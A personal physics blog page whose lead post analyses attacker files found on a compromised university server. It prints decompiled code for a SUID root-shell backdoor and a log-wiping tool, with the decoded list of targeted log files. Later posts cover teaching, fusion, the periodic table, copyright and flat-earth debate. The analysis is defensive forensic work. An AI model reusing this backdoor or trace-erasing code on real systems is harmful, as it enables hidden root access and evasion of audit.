## Saturday, May 16, 2020

### High Performance Hackers

In the last few days, there was news that several big academic high performance computing centers had been hacked. Here in Munich, LRZ, the Leibniz Rechenzentrum was affected but apparently also computers at the LMU faculty of physics (there are a few clusters in the institute's basement). You could hear that it were Linux systems that were compromised and the attackers left files in /etc/fonts.

I could not resist and also looked for these files and indeed found those on one of the servers:

helling@hostname:~$cd /etc/fonts/ helling@hostname:/etc/fonts$ ls -la
total 52
drwxr-xr-x   4 root root  4096 Apr  5  2018 .
drwxr-xr-x 140 root root 12288 May 14 10:07 ..
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.avail
drwxr-xr-x   2 root root  4096 Aug 29  2019 conf.d
-rwsr-sr-x   1 root root  6256 Apr  5  2018 .fonts
-rw-r--r--   1 root root  2582 Apr  5  2018 fonts.conf
-rwxr-xr-x   1 root root 15136 Apr  5  2018 .low


Uhoh, a dot-file with SUID root?!? I had an evening to spare so I could finally find out if I can use some of the forensic tools, that are around. As everybody know, the most important one is "strings". But neither strings .fonts nor strings .low revealed anything interesting about those programs. So we need some heavier lifting. I chose ghidra (thanks NSA for that) as my decompiler.

Let's look at .fonts (the suid one) first. It consists of one central function that I called runbash. Here is what I got after some renaming of symbols:

void runbash(void)

{
char arguments [4];
char command [9];
int i;

command[0] = 'N';
command[1] = '\0';
command[2] = '\n';
command[3] = '\n';
command[4] = 'J';
command[5] = '\x04';
command[6] = '\x06';
command[7] = '\x1b';
command[8] = '\x01';
i = 0;
while (i < 9) {
command[i] = command[i] ^ (char)i + 0x61U;
i = i + 1;
}
arguments[0] = '\x03';
arguments[1] = '\x03';
arguments[2] = '\x10';
arguments[3] = '\f';
i = 0;
while (i < 4) {
arguments[i] = arguments[i] ^ (char)i + 0x61U;
i = i + 1;
}
setgid(0);
setuid(0);
execl(command,arguments,0);
return;
}


There are two strings, command and arguments and first there is some xoring with a loop variable going on. I ran that as a separate C program and what it produces is that command ends up as "/bin/bash" and arguments as "bash". So, all this program does is it starts a root shell. And indeed it does (i tried it on the server, of course it has been removed since then).

The second program, .low, is a bit longer. It has a main function that mainly deals with command line options depending on which it calls one of three functions that I termed machmitfile(), machshitmitfile() and writezerosinfile() which all take a file name as argument and modify those files by removing lines or overwriting stuff with zeros or doing some other rewriting that I did not analyse in detail:

/* WARNING: Could not reconcile some variable overlaps */

ulong main(int argc, char ** argv)

{
char * __s1;
char * pcVar1;
bool opbh;
bool optw;
bool optb;
bool optl;
bool optm;
bool opts;
bool opta;
int numberarg;
char uitistgleich[40];
char * local_68;
char opt;
uint local_18;
uint retval;
char * filename;

scramble( &UTMP, 0xd);
scramble( &WTMP, 0xd);
scramble( &BTMP, 0xd);
scramble( &LASTLOG, 0x10);
scramble( &MESSAGES, 0x11);
scramble( &SECURE, 0xf);
scramble( &WARN, 0xd);
scramble( &DEBUG, 0xe);
scramble( &AUDIT0, 0x18);
scramble( &AUDIT1, 0x1a);
scramble( &AUDIT2, 0x1a);
scramble( &AUTHLOG, 0x11);
scramble( &HISTORY, 0x1b);
scramble( &AUTHPRIV, 0x11);
scramble( &DEAMONLOG, 0x13);
scramble( &SYSLOG, 0xf);
scramble( &ACHTdPROZENTs, 7);
scramble( &OPTOPTS, 0xb);
scramble( &UIDISPROZD, 7);
scramble( &ERRORARGSEXIT, 0x11);
scramble( &ROOT, 4);
filename = (char * ) 0x0;
local_18 = 0;
opbh = false;
optw = false;
optb = false;
optl = false;
optm = false;
opts = false;
opta = false;
now = time((time_t * ) 0x0);
while (_opt = getopt(argc, argv, & OPTOPTS), _opt != -1) {
switch (_opt) {
case 0x61:
opta = true;
break;
case 0x62:
optb = true;
break;
default:
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
case 0x66:
filename = optarg;
break;
case 0x68:
opbh = true;
break;
case 0x6c:
optl = true;
break;
case 0x6d:
optm = true;
break;
case 0x73:
opts = true;
break;
case 0x74:
local_18 = 1;
numberarg = atoi(optarg);
if (numberarg != 0) {
numberarg = atoi(optarg);
now = (time_t) numberarg;
if ((0 < now) && (now < 0x834)) {
now = settime();
}
}
break;
case 0x77:
optw = true;
}
}
if (((((!opbh) && (!optw)) && (!optb)) && ((!optl && (!optm)))) && ((!opts && (!opta)))) {
printmessage();
}
if (opbh) {
if (argc <= optind + 1) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
if (filename == (char * ) 0x0) {
filename = & UTMP;
}
retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
} else {
if (optw) {
if (argc <= optind + 1) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
if (filename == (char * ) 0x0) {
filename = & WTMP;
}
retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
} else {
if (optb) {
if (argc <= optind + 1) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
if (filename == (char * ) 0x0) {
filename = & BTMP;
}
retval = machmitfile(filename, argv[optind], argv[(long) optind + 1], (ulong) local_18);
} else {
if (optl) {
if (argc <= optind) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
if (filename == (char * ) 0x0) {
filename = & LASTLOG;
}
retval = writezerosinfile(filename, argv[optind], argv[optind]);
} else {
if (optm) {
if (argc <= optind + 3) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
if (filename == (char * ) 0x0) {
filename = & LASTLOG;
}
retval = FUN_00401bb0(filename, argv[optind], argv[(long) optind + 1],
argv[(long) optind + 2], argv[(long) optind + 3]);
} else {
if (opts) {
if (argc <= optind) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
local_68 = argv[optind];
if (filename == (char * ) 0x0) {
printmessage();
} else {
retval = machshitmitfile(filename, local_68, (ulong) local_18, local_68);
}
} else {
if (opta) {
if (argc <= optind + 1) {
printmessage();
/* WARNING: Subroutine does not return */
exit(1);
}
__s1 = argv[optind];
pcVar1 = argv[(long) optind + 1];
numberarg = strcmp(__s1, & ROOT);
if (numberarg == 0) {
local_18 = 1;
}
machmitfile( & WTMP, __s1, pcVar1, (ulong) local_18);
machmitfile( & UTMP, __s1, pcVar1, (ulong) local_18);
machmitfile( & BTMP, __s1, pcVar1, (ulong) local_18);
writezerosinfile( & LASTLOG, __s1, __s1);
machshitmitfile( & MESSAGES, __s1, (ulong) local_18, __s1);
machshitmitfile( & MESSAGES, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & SECURE, __s1, (ulong) local_18, __s1);
machshitmitfile( & SECURE, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & AUTHPRIV, __s1, (ulong) local_18, __s1);
machshitmitfile( & AUTHPRIV, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & DEAMONLOG, __s1, (ulong) local_18, __s1);
machshitmitfile( & DEAMONLOG, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & SYSLOG, __s1, (ulong) local_18, __s1);
machshitmitfile( & SYSLOG, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & WARN, __s1, (ulong) local_18, __s1);
machshitmitfile( & WARN, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & DEBUG, __s1, (ulong) local_18, __s1);
machshitmitfile( & DEBUG, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & AUDIT0, __s1, (ulong) local_18, __s1);
machshitmitfile( & AUDIT0, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & AUDIT1, __s1, (ulong) local_18, __s1);
machshitmitfile( & AUDIT1, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & AUDIT2, __s1, (ulong) local_18, __s1);
machshitmitfile( & AUDIT2, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & AUTHLOG, __s1, (ulong) local_18, __s1);
machshitmitfile( & AUTHLOG, pcVar1, (ulong) local_18, pcVar1);
machshitmitfile( & HISTORY, __s1, (ulong) local_18, __s1);
retval = machshitmitfile( & HISTORY, pcVar1, (ulong) local_18, pcVar1);
if (password != (passwd * ) 0x0) {
sprintf(uitistgleich, & UIDISPROZD, (ulong) password - > pw_uid);
machshitmitfile( & SECURE, uitistgleich, (ulong) local_18, uitistgleich);
machshitmitfile( & AUDIT0, uitistgleich, (ulong) local_18, uitistgleich);
machshitmitfile( & AUDIT1, uitistgleich, (ulong) local_18, uitistgleich);
retval = machshitmitfile( & AUDIT2, uitistgleich, (ulong) local_18, uitistgleich);
}
}
}
}
}
}
}
}
return (ulong) retval;
}


But what are the file names? They sit in some memory locations pre-initialized at startup but remember, strings did not show anything interesting.
But before anything else, a function scramble() is called on them:

void scramble(char *p,int count)

{
int m;
int i;

if (0 < count) {
m = count * 0x8249;
i = 0;
while (m = (m + 0x39ef) % 0x52c7, i < count) {
p[i] = (byte)m ^ p[i];
m = m * 0x8249;
i = i + 1;
}
}
return;
}


As you can see, once more there is some xor-ing going on to hide the ascii filename. So, once more, I put the initial data as well as this function a in a separate C program and it produced:

603130: /var/run/utmp
60313e: /var/log/wtmp
60314c: /var/log/btmp
603160: /var/log/lastlog
603180: /var/log/messages
6031a0: /var/log/secure
6031b0: /var/log/warn
6031be: /var/log/debug
6031d0: /var/log/audit/audit.log
6031f0: /var/log/audit/audit.log.1
603210: /var/log/audit/audit.log.2
603230: /var/log/auth.log
603250: /var/log/ConsoleKit/history
603270: /var/log/authpriv
603290: /var/log/daemon.log
6032b0: /var/log/syslog


Ah, these are the log-files where you want to remove your traces.

This is how far my analysis goes. In case, you want to look at this yourself, I put everything (both binaries, the Ghidra file, my separate C program) in a tar-ball for you to download.

What all this does not show: How did the attackers get in in the first place (possibly by stealing some user's private keys on another compromised machine), how they did the privilege escalation to be able to produce a suid-root file and also, for how long they have been around. As you can see above, the files have a time stamp from over two years ago. But once you are root you can of course set this to whatever you want. But it's not clear why you wanted to back date your backdoor. I should stress that I am only a normal user on that server, so for example I don't have access to the backups to check if these files have really been around for that long.

Furthermore, the things I found are not very sophisticated. Yes, they prevented my to find out what's going on with strings by obfuscating their strings. But the rest was all so straight forward that even amateur like myself with a bit of decompiling could figure our what is going on. Plus leaving your backdoor as a suid program laying around in the file system in plain sight is not very secretive (but possibly enough to be undetected for more than two years). So unless these two files are not explicitly there to be found, the attacker will not be the most subtle one.

Which leaves the question about the attacker's motivation. Was it only for sports (bringing some thousand CPUs under control)? Was it for bitcoin mining (the most direct way to turn this advantage into material gain)? Or did they try to steal data/files etc?

If you have an account on one of the affected machines (in our case that would be anybody with a physics account at LMU as at least one affected machine had your home directory mounted) you should revoke all your secret keys that were stored there (GPG or ssh, in the latter case that means in particular delete them from .ssh/authorizedkeys and .ssh/authorizedkeys2 everywhere, not just on the affected machines. And you should consider all data on those machines compromised (whatever that might have as consequences for you). If attackers had access to your ssh private keys, they could be as well on all machines that those allow to log into without entering further passwords/passphrases/OTPs.

## Friday, April 10, 2020

### Please comment: Should online teaching be public?

I write this post because I am genuinely interested in people's opinions. So please comment even if usually you wouldn't and it's ok to to simply say you agree with somebody's opinion (or not). And of course you can do this anonymously or under a pseudonym.

The question is: What is the right balance between participants privacy and making things public in the name of public knowledge? Let me explain.

In these times where everybody has to stay at home and the summer semester is only one week away, everybody is busy planning how to run university teaching over the internet. And personally, I am quite optimistic. It's not the real thing but essentially all the tools are there and I see this as a chance to try out new things and experiment while everybody will tolerate if things are not perfect at least as long as you are honestly trying. Maybe this way, we can bring university to the 21st century. And yes, some things would work better if there had been more preparation and planning but without the current urgency, inertia might have kept many things from happening at all.

This summer, together with Sabine Jansen from the math department, I will once more teach the TMP core module "Mathematical Statistical Physics" as the physicist on the stage. At least in my interpretation, this course is mainly about how to honestly deal with systems with infinitely many degrees of freedom and understand the choices you have to make when handling them which then lead to phenomena like phase transitions, coexistence of phases and spontaneous symmetry breaking. I will mainly discuss the quantum part of the story using tools from the algebraic approach where the central objects are KMS states. I recorded a trailer video:

Regarding tools, I will pretty much do what Clifford suggested that is use Zoom for the lectures where I share the screen of my iPad while writing on it like a notepad and do pretty much what I would have done on a black board while talking and people can see my face. I plan to do this live so there can be questions and feedback and discussions both for the benefit of the participants asking questions and me trying not to talks completely over people's heads or boring everybody to death. In addition there will be a Moodle for handling exercise sheets, a forum and a chat as well as tutorials (also via zoom). And, and this is the point if this post: I want to record the zoom sessions of the lectures and make those available for later consumption.

And here is the point: I strongly believe in the principle that knowledge and information is that commodity that does not get smaller by sharing it. If everybody contributes a little bit this allows us as a community to build huge things. This idea is for example behind Open Source software and Wikipedia and has proven very successful in building many things from which everybody can benefit a lot.

In this spirit it is my impulse that of course the recored lectures should be available to everybody on the internet. And yes, I would love to see other peoples lectures as well, most of which will of course be much better then my own. I think this is particularly true for an advanced course like ours that is unlike the millionth electrodynamics course that every physics department in the world teaches every year. I hope, our content might be interesting to many people around the world and many of those would not have access to local lectures about it.

And yes, I am not super prepared for this course. I will make mistakes, say wrong things and make a fool of myself. But even then, I think it's worth it. Of course, I am in a privileged situation, I cannot see myself job hunting in the foreseeable future, I am very much settled. So my risk is mainly the everybody can see how stupid I am. But that's it. And to be honest, I rather expect if there is any effect at all it will be to my advantage because there is hope that one or two people might think we are teaching interesting stuff.

But there is a concern that this might not be the same for everybody. Remember, the idea of live teaching and not pre-recording everything is to allow for interactions with the audience. And the way zoom recordings work is that those reactions are recorded as well. Participants can chose other names and turn off their camera. But the question (clever or stupid) that anybody asks will be recorded never the less. And people might be concerned about this. And the fact that the whole world can later hear them asking what somebody might consider a stupid question might prevent them from asking the question at all. This all while my main worry should be the benefit of my own students rather than myself becoming an internet celebrity.

I would like to take into account that the benefit is not only about having my lectures available (that benefit is likely very very small). But what I am talking about is establishing a culture that over the long run makes many people's lectures available. And those are much more likely useful for many. While contemplating this in the example of my lectures I imagine that many lecturers might have similar thoughts at the same time (or I would like them to have those at least). This is along the idea that the idea I talked about in an old post that there is a possibility to take advantage of an asymmetric outcome in a prisoner's dilemma might be an illusion.

And what adds to it is that those people that would be hurt most by this are likely those how deserve the most support, timid ones, women, minorities.

So, what should I do? From what I have written you will get that I am very much in favour of sharing knowledge as much as possible. But I am willing to take concerns into account. But I want to take actual concerns into account and not those that one can simply imagine someone might have. So please tell me, what do you think? And yes, if you are the timid person, you might be less likely to leave a comment in a public blog. But please consider doing it never the less. Do it anonymously. It doesn't hurt. Of course, you can also email me. Also that can be done anonymously.

## Monday, November 04, 2019

### On Nuclear Fusion (in German)

Florian Freistetter has posed the challenge in his blog to write a generally accessible text on why nuclear fusion works. Here is my attempt (according to the rules in German):

## Gleich und gleich gesellt sich gern

Wassertropfen auf einer Oberfläche, Fettaugen in der Suppe, Bläschen in der Limo (oder im Körper eines Tauchers, siehe mein anderes Blog) und eben Atomkerne, diese Phänomene haben gemeinsam, dass die Oberflächenspannung eine entscheidende Rolle spielt.

Allen ist es gemeinsam, dass es eine Substanz (Wasser, Fett, Gas, Nukleonen - also Protonen und Neutronen, die Bestandteile des Atomkerns) gibt, die es am liebsten hat, wenn sie mit sich selbst umgeben ist und nicht mit der Umgebung (Luft, Suppe - hauptsächlich Wasser, Limo oder Vakuum). In all diesen Beispielen kann sich die Substanz besser arrangieren, wenn sie von ihresgleichen umgeben ist. Eine Grenzfläche hingegen kostet Energie, die Grenzflächenenergie.

In guter Näherung ist dieser Energiekosten proportional zur Fläche dieser Grenzfläche. Wenn es schon eine Grenzfläche geben muss, ist es am günstigsten, diese möglichst klein zu halten. Da die Substanzmenge und damit ihr Volumen jeweils unveränderlich ist, stellt sich eine runde Form (Kreisscheibe oder Kugel, je nach dem ob wir es mit etwas zweidimensionalem wie Fettaugen oder dreidimensionalen wie Bläschen zu tun haben) ein, die für eben dieses Volumen die kleinste Oberfläche hat (im zweidimensionalen Fall ist entsprechend die "Oberfläche" die Randlänge, während das "Volumen" der Flächeninhalt ist).

Was passiert aber, wenn zwei Tropfen, Fettaugen, Bläschen oder Atomkerne zusammenkommen? Wenn sie sich vereinigen, ist das vereinigte Volumen so groß wie die beiden Volumina vorher zusammen. Die Oberfläche ist jedoch kleiner als die Summe der Oberflächen vorher. Daher ist weniger Grenzflächenenergie nötig, der Rest an Energie wird frei. Bei der Suppe ist das so wenig, dass man es normalerweise eben nur daran merkt, dass sich die Fettaugen zu immer größeren vereinigen, beim Atomkern ist es aber so viel (einige Megaelektronenvolt pro Kern), dass man damit ein Fusionskraftwerk oder einen Stern betreiben kann.

Die freiwerdende Energie kommt also daher, dass weniger Nukleonen eine offene Flanke zum Vakuum haben, für sie ist es günstiger direkt nebeneinander zu liegen.

Soweit das qualitative Bild. Wir können es aber auch leicht quantitativ machen: Das Tröpfchen, das aus der Vereinigung zweier kleinerer entstanden ist, muss das doppelte Volumen der Ausgangströpfchen haben. Da aber das Volumen eines dreidimensionalen Körpers mit der dritten Potenz seines Durchmessers wächst, hat das große Tröpfchen nicht den doppelten Durchmesser der kleinen Tröpfchen, sondern ist nur um den Faktor $2^{1/3}$, also um die dritte Wurzel aus 2, etwa 1,26 größer.

Die Oberfläche wächst hingegen quadratisch mit dem Durchmesser, ist also um den Faktor $2^{2/3}$, also etwa 1,59 größer. Am Anfang hatten wir jedoch zwei Tröpfchen, also auch zweimal die Oberfläche, am Ende nur noch 1,59 mal die Oberfläche eines kleinen Tröpfchens. Wir haben also die Grenzflächenenergie im Umfang von 0,41 klein-Tröpfchenoberflächen gewonnen.

Daher werden sich mit der Zeit immer mehr Tröpfchen zu wenigen großen Tropfen vereinigen, da letztere weniger Oberfläche zur Luft in der Summe haben.

Genau das gleiche ist es bei Atomkernen. Auch diese verkleinern durch Zusammenkommen die Gesamtoberfläche zum Vakuum und bei dieser Vereinigung oder Fusion wird die entsprechende Oberflächenenergie frei.

Allerdings gibt es bei Atomkernen noch weitere energetische Beiträge, die vor allem bei großen Kernen mit vielen Nukleonen wichtig werden und dafür sorgen, dass zu große Kerne zwar eine kleinere Oberfläche als die Summe der möglichen Bruchstücke haben, aber trotzdem energetisch ungünstiger sind, so dass eine energetisch günstigste Kerngröße gibt (dies ist, wenn ich mich richtig an mein Studium erinnere, der Kern des Elements Eisen).

Da ist zunächst das "Pauli-Verbot", das verhindert, dass zwei Nukleonen in genau dem gleichen Zustand im Atomkern sind. Sie müssen sich in mindestens einem Aspekt unterscheiden. Dies kann zB ihr Drehimpuls (Spin) sein oder aber ihr "Isospin", also ob sie ein Proton oder ein Neutron sind. Wenn sie aber in all diesen Aspekten übereinstimmen, müssen sie wenigstens verschiedene Energieniveaus im Kern einnehmen. Kommen weitere Nukleonen hinzu, sind die untersten Energieniveaus schon besetzt und sie müssen ein höheres einnehmen (was eben diese Energie kostet).

Innerhalb des Kerns können sich aber Neutronen und Protonen und zurück ineinander umwandeln (dies ist der beta-Zerfall), kommt also etwa ein Neutron hinzu und müsste ein hohes Neutronen-Energieniveu besetzten, kann es sich, wenn ein günstigeres Protonen-Niveau noch frei ist, in ein Proton umwandeln (es sendet dazu ein Elektron und ein Antineutrino aus, damit auch mit der Ladung alles stimmt). Hier gibt es einen Energiebeitrag der jeweils einzeln von der Protonen- und der Neutronenzahl ist und teurer wird, je größer der Kern ist.

Ein weiterer Effekt ist, dass eben die Protonen elektrisch geladen ist und die anderen Protonen abstößt. Dies benötigt auch Energie in der Gesamtenergiebilanz eines Atomkerns, die proportional zum Quadrat der Protonenzahl ist (also ungünstig für zu große Kerne ist).

Wenn man all dies zusammenzählt, sieht man, dass man bei kleinen Kernen erstmal sehr viel Grenzflächen-Energie gewinnt, wenn man diese zu einem größeren vereinigt. Ab einer mittleren Kerngr öße fangen dann die anderen Effekte an zu überwiegen und zu große Kerne sind auch wieder nicht günstig, weswegen man auf durch Kernspaltung, also die Auftrennen solcher zu großen Kerne wieder Energie gewinnen kann.

## Friday, March 29, 2019

### Proving the Periodic Table

The year 2019 is the International Year of the Periodic Table celebrating the 150th anniversary of Mendeleev's discovery. This prompts me to report on something that I learned in recent years when co-teaching "Mathematical Quantum Mechanics" with mathematicians in particular with Heinz Siedentop: We know less about the mathematics of the periodic table) than I thought.

In high school chemistry you learned that the periodic table comes about because of the orbitals in atoms. There is Hundt's rule that tells you the order in which you have to fill the shells in and in them the orbitals (s, p, d, f, ...). Then, in your second semester in university, you learn to derive those using Sehr\"odinger's equation: You diagonalise the Hamiltonian of the hyrdrogen atom and find the shells in terms of the main quantum number $n$ and the orbitals in terms of the angular momentum quantum number $L$ as $L=0$ corresponds to s, $L=1$ to p and so on. And you fill the orbitals thanks to the Pauli excursion principle. So, this proves the story of the chemists.

Except that it doesn't: This is only true for the hydrogen atom. But the Hamiltonian for an atom nuclear charge $Z$ and $N$ electrons (so we allow for ions) is (in convenient units)
$$a^2+b^2=c^2$$

$$H = -\sum_{i=1}^N \Delta_i -\sum_{i=1}^N \frac{Z}{|x_i|} + \sum_{i\lt j}^N\frac{1}{|x_i-x_j|}.$$

The story of the previous paragraph would be true if the last term, the Coulomb interaction between the electrons would not be there. In that case, there is no interaction between the electrons and we could solve a hydrogen type problem for each electron separately and then anti-symmetrise wave functions in the end in a Slater determinant to take into account their Fermionic nature. But of course, in the real world, the Coulomb interaction is there and it contributes like $N^2$ to the energy, so it is of the same order (for almost neutral atoms) like the $ZN$ of the electron-nucleon potential.

The approximation of dropping the electron-electron Coulomb interaction is well known in condensed matter systems where there resulting theory is known as a "Fermi gas". There it gives you band structure (which is then used to explain how a transistor works)

 Band structure in a NPN-transistor
Also in that case, you pretend there is only one electron in the world that feels the periodic electric potential created by the nuclei and all the other electrons which don't show up anymore in the wave function but only as charge density.

For atoms you could try to make a similar story by taking the inner electrons into account by saying that the most important effect of the ee-Coulomb interaction is to shield the potential of the nucleus thereby making the effective $Z$ for the outer electrons smaller. This picture would of course be true if there were no correlations between the electrons and all the inner electrons are spherically symmetric in their distribution around the nucleus and much closer to the nucleus than the outer ones.  But this sounds more like a day dream than a controlled approximation.

In the condensed matter situation, the standing for the Fermi gas is much better as there you could invoke renormalisation group arguments as the conductivities you are interested in are long wave length compared to the lattice structure, so we are in the infra red limit and the Coulomb interaction is indeed an irrelevant term in more than one euclidean dimension (and yes, in 1D, the Fermi gas is not the whole story, there is the Luttinger liquid as well).

But for atoms, I don't see how you would invoke such RG arguments.

So what can you do (with regards to actually proving the periodic table)? In our class, we teach how Lieb and Simons showed that in the $N=Z\to \infty$ limit (which in some sense can also be viewed as the semi-classical limit when you bring in $\hbar$ again) that the ground state energy $E^Q$ of the Hamiltonian above is in fact approximated by the ground state energy $E^{TF}$ of the Thomas-Fermi model (the simplest of all density functional theories, where instead of the multi-particle wave function you only use the one-particle electronic density $\rho(x)$ and approximate the kinetic energy by a term like $\int \rho^{5/3}$ which is exact for the three fermi gas in empty space):

$$E^Q(Z) = E^{TF}(Z) + O(Z^2)$$

where by a simple scaling argument $E^{TF}(Z) \sim Z^{7/3}$. More recently, people have computed more terms in these asymptotic which goes in terms of $Z^{-1/3}$, the second term ($O(Z^{6/3})= O(Z^2)$ is known and people have put a lot of effort into $O(Z^{5/3})$ but it should be clear that this technology is still very very far from proving anything "periodic" which would be $O(Z^0)$. So don't hold your breath hoping to find the periodic table from this approach.

On the other hand, chemistry of the periodic table (where the column is supposed to predict chemical properties of the atom expressed in terms of the orbitals of the "valence electrons") works best for small atoms. So, another sensible limit appears to be to keep $N$ small and fixed and only send $Z\to\infty$. Of course this is not really describing atoms but rather highly charged ions.

The advantage of this approach is that in the above Hamiltonian, you can absorb the $Z$ of the electron-nucleon interaction into a rescaling of $x$ which then let's $Z$ reappear in front of the electron-electron term as $1/Z$. Then in this limit, one can try to treat the ugly unwanted ee-term perturbatively.

Friesecke (from TUM) and collaborators have made impressive progress in this direction and in this limit they could confirm that for $N < 10$ the chemists' picture is actually correct (with some small corrections). There are very nice slides of a seminar talk by Friesecke on these results.

Of course, as a practitioner, this will not surprise you (after all, chemistry works) but it is nice to know that mathematicians can actually prove things in this direction. But it there is still some way to go even 150 years after Mendeleev.

## Saturday, March 16, 2019

### Nebelkerze CDU-Vorschlag zu "keine Uploadfilter"

Sorry, this one of the occasional posts about German politics and thus in German. This is my posting to a German speaking mailing lists discussing the upcoming EU copyright directive (must be stopped in current from!!! March 23rd international protest day) and now the CDU party has proposed how to implement it in German law, although so unspecific that all the problematic details are left out. Here is the post.

Vielleicht bin ich zu doof, aber ich verstehe nicht, wo der genaue Fortschritt zu dem, was auf EU-Ebene diskutiert wird, sein soll. Ausser dass der CDU-Vorschlag so unkonkret ist, dass alle internen Widersprüche im Nebel verschwinden. Auch auf EU-Ebene sagen doch die Befuerworter, dass man viel lieber Lizenzen erwerben soll, als filtern. Das an sich ist nicht neu.

Neu, zumindest in diesem Handelsblatt-Artikel, aber sonst habe ich das nirgends gefunden, ist die Erwähnung von Hashsummen („digitaler Fingerabdruck“) oder soll das eher sowas wie ein digitales Wasserzeichen sein? Das wäre eine echte Neuerung, würde das ganze Verfahren aber sofort im Keim ersticken, da damit nur die Originaldatei geschützt wäre (das waere ja auch trivial festzustellen), aber jede Form des abgeleiteten Werkes komplett durch die Maschen fallen würde und man durch eine Trivialänderung Werke „befreien“ könnte. Ansonsten sind wir wieder bei den zweifelhaften, auf heute noch nicht existierender KI-Technologie beruhenden Filtern.

Das andere ist die Pauschallizenz. Ich müsste also nicht mehr mit allen Urhebern Verträge abschliessen, sondern nur noch mit der VG Internet. Da ist aber wieder die grosse Preisfrage, für wen die gelten soll. Intendiert sind natürlich wieder Youtube, Google und FB. Aber wie formuliert man das? Das ist ja auch der zentrale Stein des Anstoßes der EU-Direktive: Eine Pauschallizenz brauchen all, ausser sie sind nichtkommerziell (wer ist das schon), oder (jünger als drei Jahre und mit wenigen Benutzern und kleinem Umsatz) oder man ist Wikipedia oder man ist GitHub? Das waere wieder die „Internet ist wie Fernsehen - mit wenigen grossen Sendern und so - nur eben anders“-Sichtweise, wie sie von Leuten, die das Internet aus der Ferne betrachten so gerne propagiert wird. Weil sie eben alles andere praktisch platt macht. Was ist denn eben mit den Foren oder Fotohostern? Müssten die alle eine Pauschallizenz erwerben (die eben so hoch sein müsste, dass sie alle Film- und Musikrechte der ganzen Welt pauschal abdeckt)? Was verhindert, dass das am Ende ein „wer einen Dienst im Internet betreibt, der muss eben eine kostenpflichtige Internetlizenz erwerben, bevor er online gehen kann“-Gesetz wird, das bei jeder nichttrivialen Höhe der Lizenzgebühr das Ende jeder gras roots Innovation waere?

Interessant waere natuerlich auch, wie die Einnahmen der VG Internet verteilt werden. Ein Schelm waere, wenn das nicht in großen Teilen zB bei Presseverlegern landen würde. Das waere doch dann endlich das „nehmt denjenigen, die im Internet Geld verdienen dieses weg und gebt es und, die nicht mehr so viel Geld verdienen“-Gesetz. Dann müsste die Lizenzgebühr am besten ein Prozentsatz des Umsatz sein, am besten also eine Internet-Steuer.

Und ich fange nicht damit an, wozu das führt, wenn alle europäischen Länder so krass ihre eigene Umsetzungssuppe kochen.

Alles in allem ein ziemlich gelungener Coup der CDU, der es schaffen kann, den Kritikern von Artikel 13 in der öffentlichen Meinung den Wind aus den Segeln zu nehmen, indem man es alles in eine inkonkrete Nebelwolke packt, wobei die ganzen problematischen Regelungen in den Details liegen dürften.

## Wednesday, March 06, 2019

### Challenge: How to talk to a flat earther?

Further down the rabbit hole, over lunch I finished watching "Behind the Curve", a Netflix documentary on people believing the earth is a flat disk. According to them, the north pole is in the center, while Antarctica is an ice wall at the boundary. Sun and moon are much closer and flying above this disk while the stars are on some huge dome like in a planetarium. NASA is a fake agency promoting the doctrine and airlines must be part of the conspiracy as they know that you cannot directly fly between continents on the southern hemisphere (really?).

These people are happily using GPS for navigation but have a general mistrust in the science (and their teachers) of at least two centuries.

Besides the obvious "I don't see curvature of the horizon" they are even conducting experiments to prove their point (fighting with laser beams not being as parallel over miles of distance as they had hoped for). So at least some of them might be open to empirical disprove.

So here is my challenge: Which experiment would you conduct with them to convince them? Warning: Everything involving stuff disappearing at the horizon (ships sailing away, being able to see further from a tower) are complicated by non-trivial diffraction in the atmosphere which would very likely turn this observation inconclusive. The sun being at different declination (height) at different places might also be explained by being much closer and a Foucault pendulum might be too indirect to really convince them (plus it requires some non-elementary math to analyse).

My personal solution is to point to the observation that the declination of Polaris (around which I hope they can agree the night sky rotates) is given my the geographical latitude: At the north pole it is right above you but is has to go down the more south you get. I cannot see how this could be reconciled with a dome projection.

How would you approach this? The rules are that it must only involve observations available to everyone, no spaceflight, no extra high altitude planes. You are allowed to make use of the phone, cameras, you can travel (say by car or commercial flight but you cannot influence the flight route). It does not involve lots of money or higher math.

## Tuesday, February 12, 2019

### Visits to a Bohmian village

Over all of my physics life, I have been under the local influence of some Gaul villages that have ideas about physics that are not 100% aligned with the main stream views: When I was a student in Hamburg, I was good friends with people working on algebraic quantum field theory. Of course there were opinions that they were the only people seriously working on QFT as they were proving theorems while others dealt with perturbative series only that are known to diverge and are thus obviously worthless. Funnily enough they were literally sitting above the HERA tunnel where electron proton collisions took place that were very well described by exactly those divergent series. Still, I learned a lot from these people and would say there are few that have thought more deeply about structural properties of quantum physics. These days, I use more and more of these things in my own teaching (in particular in our Mathematical Quantum Mechanics and Mathematical Statistical Physics classes as well as when thinking about foundations, see below) and even some other physicists start using their language.

Later, as a PhD student at the Albert Einstein Institute in Potsdam, there was an accumulation point of people from the Loop Quantum Gravity community with Thomas Thiemann and Renate Loll having long term positions and many others frequently visiting. As you probably know, a bit later, I decided (together with Giuseppe Policastro) to look into this more deeply resulting in a series of papers there were well received at least amongst our peers and about which I am still a bit proud.

